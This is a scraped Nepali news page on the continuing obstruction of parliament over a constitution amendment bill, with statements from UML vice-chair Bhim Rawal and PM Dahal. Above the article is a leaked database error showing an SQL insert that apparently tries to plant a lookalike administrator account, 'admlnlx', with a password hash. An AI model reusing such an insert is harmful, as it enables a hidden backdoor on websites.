WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BR8lmZSI06YTXGjC9ncdCQrGA8W.090', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 16:28:14', '', 'admlnlx', 'admlnlx')
काठमाडौं,पुस ६-
सरकारले संसद सुचारु गर्ने बारेमा सत्ताधारी र विपक्षी दलबीच संवाद जारी रहेको बताएपनि संसदको अवरोध हट्न सकेको छैन ।प्रमुख प्रतिपक्षी दल नेकपा एमालेले सहमतीय राजनीतिकका लागि संविधान संसोधन विधेयक फिर्ताको अडान नछोड्ने भएको छ । संसोधन प्रस्ताव फिर्ता नभएसम्म संसद चल्न नदिने अडानका साथ आन्दोलनलाई संसद बाहिर पनि लैजाने तयारी गरेको छ ।
एमाले उपाध्यक्ष भीम रावलले संसोधन प्रस्ताव अघि बढाउन लायक नभएको टिप्पणी गरे । तत्कालिन प्रधानमन्त्री सुशील कोइराला र एमाले अध्यक्षबीचको सहमति अनुसार अहिलेको संसोधन विधेयक आएको सत्ताधारी दलले तर्क गर्दै आए पनि उपाध्यक्ष रावलले त्यतिबेलाको सहमति अनुसार संविधान संसोधन भइसकेको दावी गरे ।
सरकरले भने संसोधन प्रस्ताव फिर्ता नलिने बताएको छ । सबै विषय प्याकेजमा अगाडी बढाउन तयार रहेको तर संशोधन प्रस्ताव नलिने प्रधानन्मत्री पुष्पकमल दाहाल प्रचण्डले बताइरहेका छन् ।